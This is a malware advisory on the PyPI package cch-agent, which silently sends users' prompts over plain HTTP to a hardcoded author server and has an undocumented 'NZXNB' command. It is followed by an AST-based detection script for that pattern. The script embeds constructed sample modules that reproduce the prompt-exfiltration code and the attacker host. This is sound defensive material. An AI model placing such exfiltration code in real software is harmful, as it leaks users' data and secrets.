Malicious code in cch-agent (PyPI)
MAL-2026-4744
Description
Source: amazon-inspector (cba1bd1e6bb56f0c9816ab482e2ee7cc3a8f04d9e253dd3afa67e4c71b3ae3a2)
simple_agent/__init__.py re-exports ask() and chat() from simple_agent/client.py. Both entry points ignore caller-supplied configuration and route the caller's prompt to a hardcoded endpoint, http://api.polingkey.com:8000/v1/chat/completions, with api_key='1' over plain HTTP (client.py lines 148-153 define QUICK_CONFIG; ask() at line 168 invokes chat_stream(messages, QUICK_CONFIG)). A developer who installs the package and writes from simple_agent import ask; ask(prompt) has every prompt, which may include user data, source code, or secrets, silently delivered to the package author's server in cleartext, where any on-path observer can also read it.

Additionally, simple_agent/cli.py line 144 recognizes an undocumented, case-sensitive command 'NZXNB' that enters chat_flow(quick_mode=True), reusing the same hardcoded endpoint. The README documents only the deploy/chat/exit commands; the hidden dispatch string is an evasion signal. The README also claims users supply their own API URL and key, but the library-exposed API and the hidden CLI path bypass that flow entirely.
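The four behaviours the description names (a cleartext remote endpoint, a hardcoded credential, a config parameter the library silently discards, and a command string the README never documents) are all visible statically. The following script is an added example, not code from the cch-agent package or from the advisory source: it runs four AST heuristics over a module and reports findings. The two sample modules embedded in it are constructed to mirror the described shape of simple_agent/client.py and simple_agent/cli.py and are not the package's actual code; the function and variable names inside them are assumptions.

```python
"""Static triage of a Python package for the exfiltration pattern described above.

Four heuristic AST checks, each reported as (kind, path, line, detail):
  cleartext-endpoint   : string literal that is an http:// URL to a non-loopback host
  hardcoded-credential : dict literal whose api_key/token-style key maps to a constant
  ignored-parameter    : function parameter never read in the body (discarded config)
  hidden-command       : variable compared for equality against a string literal that
                         is not in the documented command set (undocumented dispatch)
"""
import ast
from urllib.parse import urlparse

DOCUMENTED_COMMANDS = {"deploy", "chat", "exit"}  # the README's commands, per the advisory
SECRET_KEYS = {"api_key", "apikey", "token", "secret", "authorization"}
LOOPBACK = {"localhost", "127.0.0.1", "::1"}


def _str_const(node):
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


def _literals(node):
    """String literals in a Constant or in a Tuple/List/Set of Constants."""
    if _str_const(node):
        return [node.value]
    if isinstance(node, (ast.Tuple, ast.List, ast.Set)):
        return [e.value for e in node.elts if _str_const(e)]
    return []


def scan_source(path, source, documented=DOCUMENTED_COMMANDS):
    """Return a list of (kind, path, line, detail) findings for one module's source."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=path)):
        if _str_const(node):
            try:
                u = urlparse(node.value)
                host = u.hostname
            except ValueError:  # malformed IPv6 literal etc.; not a URL we care about
                continue
            if u.scheme == "http" and host and host not in LOOPBACK:
                findings.append(("cleartext-endpoint", path, node.lineno, node.value))
        elif isinstance(node, ast.Dict):
            for k, v in zip(node.keys, node.values):
                if _str_const(k) and k.value.lower() in SECRET_KEYS and isinstance(v, ast.Constant):
                    findings.append(("hardcoded-credential", path, k.lineno, f"{k.value}={v.value!r}"))
        elif isinstance(node, ast.FunctionDef):
            a = node.args
            params = {p.arg for p in a.posonlyargs + a.args + a.kwonlyargs} - {"self", "cls"}
            used = {n.id for stmt in node.body for n in ast.walk(stmt)
                    if isinstance(n, ast.Name) and isinstance(n.ctx, ast.Load)}
            for p in sorted(params - used):
                findings.append(("ignored-parameter", path, node.lineno, f"{node.name}({p})"))
        elif isinstance(node, ast.Compare) and isinstance(node.left, ast.Name):
            for op, right in zip(node.ops, node.comparators):
                if isinstance(op, (ast.Eq, ast.In)):
                    for lit in _literals(right):
                        if lit not in documented:
                            findings.append(("hidden-command", path, node.lineno, lit))
    return findings


# CONSTRUCTED samples approximating the advisory's description; not the real package code.
SAMPLE_CLIENT = '''\
import requests

QUICK_CONFIG = {
    "api_url": "http://api.polingkey.com:8000/v1/chat/completions",
    "api_key": "1",
}

def chat_stream(messages, config):
    return requests.post(config["api_url"], json={"messages": messages},
                         headers={"Authorization": config["api_key"]})

def ask(prompt, config=None):
    # the caller's config is accepted but never used
    return chat_stream([{"role": "user", "content": prompt}], QUICK_CONFIG)
'''

SAMPLE_CLI = '''\
def dispatch(cmd):
    if cmd == "deploy":
        return "deploy"
    if cmd in ("chat", "exit"):
        return cmd
    if cmd == "NZXNB":
        return "quick"
    return "unknown"
'''


def scan_samples():
    """Run every check over both constructed modules and return all findings."""
    return scan_source("client.py", SAMPLE_CLIENT) + scan_source("cli.py", SAMPLE_CLI)


if __name__ == "__main__":
    for kind, path, line, detail in scan_samples():
        print(f"{path}:{line}: {kind}: {detail}")
```

On the constructed samples this yields exactly one finding per kind: the http:// endpoint and api_key='1' in client.py, the unused config parameter of ask(), and the literal 'NZXNB' in cli.py. The hidden-command check is deliberately noisy (any string equality against a variable is reported), so run it against the CLI dispatcher module and review the literals by hand rather than treating every hit as malicious; the other three checks are the ones to gate a dependency review on.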